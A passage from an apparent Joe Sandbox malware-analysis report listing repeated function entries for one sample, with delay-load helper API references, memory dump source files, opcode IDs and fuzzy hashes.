                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 4010e98204556681b4d26f07e08866e62167246b3882d3e2d84f9dd8ca00c72a
                                                                          • Instruction ID: f6e7ce2636fc5c907365937a21b4f64fa6de44bfa64b23c2dc130da6ec09280c
                                                                          • Opcode Fuzzy Hash: 4010e98204556681b4d26f07e08866e62167246b3882d3e2d84f9dd8ca00c72a
                                                                          • Instruction Fuzzy Hash: A9B012E2258000BC314451151F06DB7118CD6C1B30730403EFC06D0181DC40ADC23972
                                                                          Function 00F1E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: d08dc08d63edc3c39da5c1c1ddee2331b670ed9aa3e89c661f8e6c7bda4a3168
                                                                          • Instruction ID: 52ae6fc91e9be43119cc705b34a908c36e609fc90c874c98b7a46a8187b9d81b
                                                                          • Opcode Fuzzy Hash: d08dc08d63edc3c39da5c1c1ddee2331b670ed9aa3e89c661f8e6c7bda4a3168
                                                                          • Instruction Fuzzy Hash: 39B012D2269040BC314451151D06DB7114DEBC1B30730403EFC07D0181D850AC813972
                                                                          Function 00F1E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 7fd47871ef04fbbfc60670587ada684236096a806d4d42372220c30529f2e8e3
                                                                          • Instruction ID: a072e20340e62f95b5cec792aaa3be02f02a854c3b1509c9cf9f4e65b7b7b04b
                                                                          • Opcode Fuzzy Hash: 7fd47871ef04fbbfc60670587ada684236096a806d4d42372220c30529f2e8e3
                                                                          • Instruction Fuzzy Hash: 85B012D2658000BC314451251E06DB7114CD6C2B30330803EFC06D0181D840ECC13972
                                                                          Function 00F1E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 9e3e4d867bd397146b4d4efc2e0fe08bdd7699c4ae650c2fa9ea7afb620c6539
                                                                          • Instruction ID: e098640b9398891ae02d1ccb94c8f54de2d133dcd7d2f82652c5fd602ce03286
                                                                          • Opcode Fuzzy Hash: 9e3e4d867bd397146b4d4efc2e0fe08bdd7699c4ae650c2fa9ea7afb620c6539
                                                                          • Instruction Fuzzy Hash: 42B012E2259140BD318452151D06DB7110DD7C1B30730413EFC06D0181D850ACC53972
                                                                          Function 00F1E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 35e87b827141bce364ab25f1ee379d5bf7ffb25691766c428a37fd1b10292012
                                                                          • Instruction ID: 7559184d83983466cbd4b6b371af93188e390ab5c27322101e6f14f95cbb6a14
                                                                          • Opcode Fuzzy Hash: 35e87b827141bce364ab25f1ee379d5bf7ffb25691766c428a37fd1b10292012
                                                                          • Instruction Fuzzy Hash: 46B012D2659040BC314451151D06DB7110DD7C2B30730803EFC06D0181D850EC813972
                                                                          Function 00F1E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: a71c4efeba7d5a620dc56f258df94845e90a107eb62a4c36a1005b61786f436e
                                                                          • Instruction ID: e1fc0cba1f132ab7dbdd53b30f4c874fce1efc662f7bf96e59c2417af8bb60e4
                                                                          • Opcode Fuzzy Hash: a71c4efeba7d5a620dc56f258df94845e90a107eb62a4c36a1005b61786f436e
                                                                          • Instruction Fuzzy Hash: C7B012E2258000BC314455151E06DB7110CD6C1F30330403EFC06D0182DC40AE823A72
                                                                          Function 00F1E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: e76e4614df20eb4d26af9c08658dadaab8137f5a3a1f67949b7e0b4b922118d6
                                                                          • Instruction ID: 5330944edf13a0742481495e3896e1843745899a1bfbe337bc8349c391272c30
                                                                          • Opcode Fuzzy Hash: e76e4614df20eb4d26af9c08658dadaab8137f5a3a1f67949b7e0b4b922118d6
                                                                          • Instruction Fuzzy Hash: CBB012E2258000BC314451161D06DB7110CE6C1F30330403EFC06D0182D840AD813A72
                                                                          Function 00F1E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 7b71fb04b49fc3b9fdd47366d70113e0c46c3e11c3b20c708fe488b371942e31
                                                                          • Instruction ID: c3a81658f7b66ba5e9a1def3bed473d61c08d506c55c1b5ecd6d745c1a661ff2
                                                                          • Opcode Fuzzy Hash: 7b71fb04b49fc3b9fdd47366d70113e0c46c3e11c3b20c708fe488b371942e31
                                                                          • Instruction Fuzzy Hash: 68B012E2258100BD318451151D06DB7110CD6C1F30330413EFC06D0182D840ADC13AB2
                                                                          Function 00F1E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: ee808bcfc0f60226557946d1ef3dee66bd4e58fd3c2a2d0efc1e2a073b90a7ab
                                                                          • Instruction ID: 55320b4b3f9219c963cb7dc17fed90ae25764493f41db98365568ff1e611b87b
                                                                          • Opcode Fuzzy Hash: ee808bcfc0f60226557946d1ef3dee66bd4e58fd3c2a2d0efc1e2a073b90a7ab
                                                                          • Instruction Fuzzy Hash: 58B012E2658000BC314451151D06DB7110CD6C2F30330803EFC06D0182D840ED853A72
                                                                          Function 00F1E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: ee5ab6320fd26ada16cdbaa66e858145b03c2146598fbf731240b1bbf08e5822
                                                                          • Instruction ID: 5fd82ab545123c68676cc45e6da2000deba20c9bf3936345b1858c5be77b0026
                                                                          • Opcode Fuzzy Hash: ee5ab6320fd26ada16cdbaa66e858145b03c2146598fbf731240b1bbf08e5822
                                                                          • Instruction Fuzzy Hash: 30B012D2368140BD318452151D06DB7110CD6C1B30330813EFC06D0281D840ACC53972
                                                                          Function 00F1E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E1E3
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 4f8f3fac8f2755331315b50b4104a3b81e8748b4b317fff0eb67b93588be5bff
                                                                          • Instruction ID: fc72cda10b5d251d660ac0028f2df1806fe3c5ef2744f74c1c3692f43f1f2201
                                                                          • Opcode Fuzzy Hash: 4f8f3fac8f2755331315b50b4104a3b81e8748b4b317fff0eb67b93588be5bff
                                                                          • Instruction Fuzzy Hash: A9B012D2258000BC314452151E06DB7110CD6C1B30330803EFC06D0281DC50AD8A3972
                                                                          Function 00F1E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 7c938954be1e3085eaee63ec9072f8e1a1f863d3c1211d9a03510b4a2ef8fc16
                                                                          • Instruction ID: b57477afe0c2372243fe9590ad336699aa6806d9710e36633a0fa133d397a266
                                                                          • Opcode Fuzzy Hash: 7c938954be1e3085eaee63ec9072f8e1a1f863d3c1211d9a03510b4a2ef8fc16
                                                                          • Instruction Fuzzy Hash: A0B012E225C010BC310891041D03DB7120CC4C0B30730C02EFC18D1081D8408C893973
                                                                          Function 00F1E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 4baa1adae7cb391196c5e304c8c0c600296022fbf3311b03d37a26d6cb35cb79
                                                                          • Instruction ID: 5746d099f6236efe806352a779ac5e8d8bdc0964ec90218dcffc39a29858d0b9
                                                                          • Opcode Fuzzy Hash: 4baa1adae7cb391196c5e304c8c0c600296022fbf3311b03d37a26d6cb35cb79
                                                                          • Instruction Fuzzy Hash: E9B012F225C010FC310891041C03DB7120CC4C0F30731802EFC18D1082D8448E893A73
                                                                          Function 00F1E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E3FC
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 73d52daf4ffe8b3ae86a6df144b632ad098838e8caf137552597e7c2657c05cb
                                                                          • Instruction ID: b2d6f71c9ea0fb47f1b839106b63425bbc61c150c696a705242c818483f59761
                                                                          • Opcode Fuzzy Hash: 73d52daf4ffe8b3ae86a6df144b632ad098838e8caf137552597e7c2657c05cb
                                                                          • Instruction Fuzzy Hash: 50B012E225C0107C310851041E03DF7120CC4C0B30730C02EFD18D1081D8404C8E3973
                                                                          Function 00F1E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E580
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
